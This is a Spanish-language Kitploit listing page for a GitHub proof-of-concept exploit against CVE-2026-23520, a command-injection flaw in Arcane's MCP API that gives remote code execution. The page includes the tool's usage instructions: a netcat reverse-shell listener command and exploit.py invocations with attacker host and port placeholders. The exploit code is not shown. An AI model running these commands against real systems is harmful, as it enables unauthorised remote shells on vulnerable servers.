Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-23520 — Prueba de concepto de exploit para CVE-2026-23520, una vulnerabilidad de inyección de comandos en el servicio de actualización de Arcane, que permite la ejecución remota de código mediante solicitudes API manipuladas. | Kitploit
Herramientas/GitHubGitHub/cypher-21/cve-2026-23520
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubcypher-21/cve-2026-23520

CVE-2026-23520

Prueba de concepto de exploit para CVE-2026-23520, una vulnerabilidad de inyección de comandos en el servicio de actualización de Arcane, que permite la ejecución remota de código mediante solicitudes API manipuladas.

Ver Repositorio
2hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-23520

PoC de Ejecución Remota de Comandos (RCE) en la API MCP


📌 Descripción general

Este repositorio contiene un PoC (Prueba de Concepto) de explotación para una vulnerabilidad de Ejecución Remota de Comandos (RCE) que afecta a aplicaciones que exponen un endpoint vulnerable de la API MCP (comúnmente /api/mcp/connect).

La vulnerabilidad permite la ejecución de comandos a nivel de sistema mediante una solicitud API manipulada.


🚀 Inicio rápido

1. Iniciar un listener

root@kitploit:~
nc -lvnp ATTACKER_PORT

2. Ejecutar el exploit

root@kitploit:~
python3 exploit.py TARGET --lhost ATTACKER_IP --lport ATTACKER_PORT

📥 Uso

root@kitploit:~
python3 exploit.py <target> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT> [options]

🔑 Argumentos obligatorios

ArgumentoDescripción
targetIP, dominio o URL del objetivo
--lhostIP del atacante
--lportPuerto del atacante

🔧 Argumentos opcionales

FlagDescripción
-p, --portPuerto del objetivo (predeterminado: 443)
-s, --schemehttp o https (predeterminado: https)
-e, --endpointRuta del endpoint de la API
-t, --timeoutTiempo de espera de la solicitud
-v, --verboseSalida de depuración

🧪 Ejemplos

root@kitploit:~
python3 exploit.py example.com --lhost 10.10.10.10 --lport 4444
root@kitploit:~
python3 exploit.py example.com -s http -p 80 --lhost 10.10.10.10 --lport 4444

🧠 Notas

  • Un tiempo de espera no indica necesariamente un fallo.
  • Asegúrate de que tu listener esté en ejecución antes de la explotación.
  • El payload asume que /bin/bash está disponible.

⚠️ Aviso legal

Solo para pruebas autorizadas y fines educativos.


👨‍💻 Autor

Parosh B

Descargar herramienta